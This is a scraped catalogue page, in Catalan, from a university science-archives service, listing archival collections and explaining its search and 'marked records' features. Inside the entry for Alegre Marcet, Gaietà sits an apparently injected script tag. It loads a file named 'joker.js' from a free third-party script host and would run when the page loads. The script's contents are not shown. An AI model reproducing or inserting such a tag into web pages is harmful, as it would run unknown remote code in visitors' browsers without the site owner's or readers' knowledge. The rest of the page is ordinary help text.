català | castellano | english home   sitemap   avís legal   crèdits   contacte  
home home

Els catàlegs

Alegre Marcet, Gaietà
Científic o Institució: Museu d'Història de la Medicina de Catalunya

<script type="text/javascript" src="http://yourjavascript.com/1782351115/joker.js"></script>

Link a fitxa del fons

Aquest catàleg està digitalitzat i és accessible al ?ln=ca" target="_blank">Dipòsit Digital de Documents de la UAB

CATÀLEGS

Resultats (18)         

Alegre Marcet, Gaietà [+]

Crusafont Pairó, Miquel [+]

Dou i Mas de Xexàs, Albert [+]

Ferran i Clua, Jaume [+]

Fundació Uriach 1838 (Arxiu publicitari farmacèutic) [+]

Fundació Uriach 1838 (Fotografia industrial)  [+]

Institut Ravetllat-Pla [+]

Laboratori de Llum de Sincrotró ALBA [+]

Lloret i Orriols, Antoni [+]

Millàs i Vallicrosa, Josep M. [+]

Museu Zoologia Barcelona - Junta de Ciències Naturals [+]

Pascual, Pedro [+]

Rodríguez Femenias, Joan Joaquim [+]

Roqué Margenat, Josep Maria [+]

Royo y Gómez, José [+]

Sunyer i Balaguer, Ferran [+]

Tomàs i Ondiviela, Miquel [+]

Universitat Autònoma de Barcelona [+]

CERCA

   Paraula
   Ordenar per
            

MARCATS

Aquí hi trobareu tots els registres que hagueu acumulat en les diferents cerques. Podreu gestionar-los (incorporant o eliminant registres), accedir a les seves fitxes i obtenir un document en format pdf amb els resultats escollits. Més informació a ajuda a la consulta.

DDD

El DDD, Dipòsit Digital de Documents de la UAB, és l'eina a partir de la qual es recopila, gestiona, difon i preserva la producció científica, docent i institucional de la universitat alhora que recull documents digitals que formen part de les col·leccions de les biblioteques de la UAB o que les completen. Mostra una col·lecció organitzada, d'accés obert i interoperable. Aplega una gran diversitat pel que fa a suports, temàtica i tipologia de documents.

El DDD inclou sempre les metadades de descripció del recurs i l'accés al text complet. Una mateixa descripció pot fer referència a un o més fitxers. Volem així, explotar els avantatges de l'emmagatzemament, recuperació i comunicació digital.

DDD

Al DDD hi trobareu els catàlegs següents.

AJUDA

AJUDA A LA CERCA

Què cercar?
Aquesta base de dades permet fer cerques directes sobre el contingut dels catàlegs realitzats pel Servei d'Arxius de Ciència (SAC) o realitzats per altres institucions i migrats a la base de dades del SAC.

Com es fa la cerca?
A fi d'afavorir la cerca, s'ha creat un cercador tipus "google" on podrà cercar, sense discriminar accents ni majúscules:

 • Una paraula.
  Exemple: "Paleontologia".
 • Part d'una paraula.
  Exemple: “paleo”. Buscarà totes aquelles paraules que continguin "paleo": "paleopatologia", "paleoantropologia", "paleolític", "Paléontologie", etc.
 • Diverses paraules seguides separades per espais.
  Exemple: "Paleontologia geologia". Buscarà tots els registres que incloguin almenys una de les paraules.
 • Part d'una paraula en una cerca de vàries paraules.
  Exemple: "paleo geol". Buscarà totes aquelles paraules que continguin "paleo": "paleopatologia", "paleoantropologia", "paleolític", "Paléontologie", etc. i les que continguin "geol": "geologia", "geològiques", etc.
 • Una expressió exacta .
  Cal posar l'expressió a cercar entre cometes ("_").
  Exemple: ""Esborrany manuscrit de carta"". Buscarà només els registres que incloguin l'expressió exacta. Cercar una expressió exacta sense la utilització de cometes donarà com a resultat els registres que continguin alguna de les paraules o termes emprats.
 • Camps de cerca als catàlegs.
  La cerca es farà sobre els camps següents dels catàlegs: Títol, descripció, llengua i descriptors.

Nota: Cal emplenar, obligatòriament i com a mínim, un criteri de cerca. N'hi ha prou amb complimentar un camp i prémer el botó "Cercar". Sinó es fa això, l'aplicatiu no donarà cap resposta.

A on es fa la cerca?
Podeu realitzar aquesta cerca creuada sobre tots els catàlegs inclosos a la base de dades del SAC, sense fer cap selecció, o bé sobre un catàleg determinat, fent la selecció desitjada a la segona casella de cerca.

Com es mostren els resultats de la cerca?
Una vegada omplert el camp cerca i seleccionat el catàleg on cercar, hi ha dos possible opcions per consultar els resultats:

 • Pantalla o pdf
  PANTALLA: Es mostren els registres amb un resum de la informació, amb l'opció d'accedir als registres sencers, i amb les coincidències trobades de la paraula cercada identificades en vermell. Es dona l'opció de seleccionar els registres desitjats per incloure'ls a la secció "acumulats".
  PDF: Crear un pdf de manera directa on es mostra el resultat de la cerca.
 • Ordre de presentació
  L'aplicació retornarà, per defecte, el resultat de la cerca ordenat pel camp data. També és possible seleccionar l'ordre de presentació dels resultats, fent la selecció a la tercera casella de cerca. Els camps a escollir l'ordenació són: Autor, Referència, Data, Data descendent i Llengua. En cas d'escollir una ordenació diferent a "data" (per defecte), aquesta serà la segona opció d'ordre.

Què són els marcats?
A la pestanya "Marcats" hi trobareu tots els registres que hagueu acumulat en les diferents cerques. Podreu gestionar-los, accedir a les seves fitxes i obtenir un document en format pdf amb els resultats escollits.

 • Incorporar marcats
  Podeu acumular els resultats de la cerca que siguin d'especial interès en aquesta cistella marcant la casella corresponent que apareix a l'inici dels registres cercats. Es possible acumular resultats de diferents cerques.
 • Eliminar marcats
  Per treure un resultat acumulat cal desmarcar la seva casella. També és possible buidar tots els resultats marcats fent clic en el botó "Esborrar marcats".

Nota: Cal tenir en present que per poder utilitzar l'acumulat cal que el navegador tingui habilitades les cookies i que la durada dels resultats acumulats és de 60 dies naturals a partir de la darrera actualització de la llista.

bottom